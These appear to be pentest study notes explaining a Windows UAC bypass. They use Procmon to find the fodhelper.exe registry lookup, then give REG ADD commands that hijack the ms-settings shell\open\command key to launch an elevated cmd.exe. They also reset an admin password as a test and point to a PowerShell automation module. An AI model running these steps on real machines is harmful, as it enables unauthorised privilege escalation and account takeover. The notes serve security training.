UAC bypass

User Access Control

Vulnerable Binary for example : fodhelper.exe

• Gather info regarding exe integrity level & permission req.

  Tool :- sigcheck.exe

  • In Cmd, cd to SysternalsSuite directory
    sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
    

  • It show that Administrator is required and Autoelevate is true
    
    

• Gather info about how this exe interact with file system and windows registry

  Tool : Procmon.exe (process monitor) from sysinternals

  • Open Procmon.exe tool , start fodhelper.exe , Add below filters

  • Filter: Process Name , is , fodhelper.exe , Include

  • Filter: Operation , contains , Reg , Include

  • Filter: Result , is , NAME NOT FOUND , Include

  • Filter: Path , contains , HKCU , Include

  • Now , Apply filter and locate for some interesting path that can be modified
    For ex:
    HKCU:\Software\Classes\ms-settings\shell\open\command can be checked.

  • Now , Change Path filter and remove Result
    Filter:
    Path , contains , ms-settings\shell\open\command , Include

  • Check If the process can successfully access that key in some other hive, the results will provide us with more clues. Like When HKCU:\Software\Classes\ms-settings\shell\open\command is not found . It locate HKCR which exist and is successful

  • As exe tries to find HKCU:\Software\Classes\ms-settings\shell\open\command first , the path can be modified as we have necessary permission to edit it

  • Add this key with REG utility in cmd
    
    REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command

  • Now, restart the fodhelper.exe and add 1st four filters

  • Vuln exe is looking DelegateExecute in new added key

  • Add DelegateExecute with empty value in cmd
    
    REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

  • Again , restart the fodhelper.exe and add 1st . 2nd , 4th filters

  • This time it is suucessful but since DelegateExecute is empty , it also look for (Default)
     entry value of the 
    Shell\open\command registry key. The (Default) entry value is created as null automatically when adding any registry key

  • Replace the empty (Default) value with an executable of our choice, cmd.exe in cmd
    
    REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

  • Exploit

    • Restart fothelper.exe , it will now open CMD automatically with high intergrity level

    • To check , if we have successfully achieve high integrity , try to change admin password
      
      net user admin Ev!lpass

  • Automation tool

    • https://github.com/CsEnox/EventViewer-UACBypass

    • Import-Module .\Invoke-EventViewer.ps1

    • Invoke-EventViewer cmd.exe